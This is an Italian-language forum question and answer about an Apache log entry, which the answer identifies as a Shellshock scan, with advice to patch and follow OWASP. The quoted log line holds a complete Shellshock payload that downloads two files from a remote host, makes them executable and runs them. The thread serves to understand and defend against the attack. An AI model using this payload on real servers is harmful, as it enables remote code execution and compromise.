(file di log httpd) Che tipo di attacco è? Come posso impedirlo? [duplicare]

3

Nei miei file di registro vedo centinaia di questi registri. Devo dire che l'IP del client cambia a volte. Quindi ci sono 3 o 4 IP che inviano queste richieste ...

L'altruiqualcosa (che ho omesso) è sempre la stessa.

[Sat Apr 11 21:34:13 2015] [error] [client xx.xxx.xx.xxx] script not found or unable to stat: /home/Myuser/web/myweb.something/cgi-bin/php5-cli, referer: () { :;} ;echo;/usr/local/bin/php -r '$a = "http://othersite.something//Help1";''$b = "http://othersite.something//Help2";''$c = sys_get_temp_dir();''$d = "Help1";''$e = "Help2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''if ($i($c . "/$d"))''{''exit(1);''}else{''echo($c);''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'

Alcuni attacchi cercano di usare il mio server per fare qualcosa su un altro server (othersite.qualcosa)?
O questo attacco è di nuovo il mio server?

Ho visto che tutti i registri appaiono come [errori] ma vorrei fermarmi dopo x tentativi falliti ...
Ma sembra che fail2ban non funzioni correttamente.

Devo anche dire che non sto usando la cartella cgi-bin ... non c'è nulla di iniside ... posso semplicemente impostare i permessi 640 o 600 per evitare questo?

    
posta dac777 12.04.2015 - 13:01
fonte

1 risposta

2

Questo attacco è una variante di Shellshock , indicato dal codice bash trovato all'inizio del payload: () { :;} ; . Il modo in cui impedisci l'esecuzione della scansione da parte dei robot consiste nel disconnettere il tuo server da Internet. Le scansioni per le vulnerabilità di esecuzione di codice remoto come Shellshock sono estremamente comuni e non stanno andando via in qualunque momento presto.

Un approccio più pratico alla sicurezza è garantire che il tuo sistema sia completamente aggiornato e seguendo le pratiche di codifica sicure. Il OWASP top 10 è un buon punto di partenza, essere vulnerabili a Shellsock sarebbe una violazione di OWASP A9: utilizzo di componenti con vulnerabilità note .

    
risposta data 12.04.2015 - 18:06
fonte

Leggi altre domande sui tag